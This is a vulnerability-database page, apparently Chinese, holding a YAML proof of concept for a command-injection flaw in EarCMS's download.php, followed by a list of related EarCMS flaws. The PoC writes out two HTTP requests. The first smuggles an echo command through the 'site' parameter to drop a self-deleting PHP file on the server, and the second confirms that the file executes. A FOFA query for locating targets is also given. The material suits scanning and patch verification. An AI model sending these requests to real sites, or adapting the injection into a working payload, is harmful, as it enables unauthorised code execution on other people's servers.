earcms-download-php-exec: EarCMS Download PHP executable

漏洞描述

PoC代码[已公开]

id: earcms-download-php-exec

info:
  name: EarCMS Download PHP executable
  author: xpoc
  severity: critical
  verified: false
  description: |
    FOFA: app="EearCMS"
  reference:
    - https://zhuanlan.zhihu.com/p/81934322
  tags: earcms,rce
  created: 2023/06/22

set:
    r1: randomInt(40000, 44800)
    randname: randomLowercase(6)
rules:
    r0:
        request:
            method: GET
            path: /source/pack/127.0.0.1/download.php?site=1%3Becho+%27%3C%3Fphp+echo+md5%28{{r1}}%29%3Bunlink%28__FILE__%29%3B%3F%3E%27+%3E+{{randname}}.php%3B
        expression: response.status == 200
    r1:
        request:
            method: GET
            path: /source/pack/127.0.0.1/{{randname}}.php
        expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
expression: r0() && r1()

相关漏洞推荐

• earcms app.php存在sql注入 无POC

  2024-02-27 | EarCMS
  耳朵音乐(EarMusic)是一款界面采用Discuz后台样式与UCHome用户中心样式相结合、内核由高速模板引擎与缓存机制等框架并存的PHP开源音乐系统。earcms存在sql注入漏洞。

• earcms put_upload.php存在sql注入 无POC

  2023-10-19 | EarCMS
  耳朵音乐(EarMusic)是一款界面采用Discuz后台样式与UCHome用户中心样式相结合、内核由高速模板引擎与缓存机制等框架并存的PHP开源音乐系统。earcms存在sql注入漏洞。

• EarCMS /source/index/put_upload.php 任意文件上传漏洞 无POC

  2023-09-05 | EarCMS
  EarCMS /source/index/put_upload.php 存在任意文件上传漏洞

• earcms-index-uplog-php-file-upload: Ear CMS index file upload POC

  2025-09-01 | Ear CMS
  FOFA: app="EearCMS"

• SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

  2025-09-22 00:22:31 | SourceCodester Pet Grooming Management Software
  SourceCodester Pet Grooming Management Software是SourceCodester开源的一个宠物美容管理系统。 SourceCodester Pet Groo...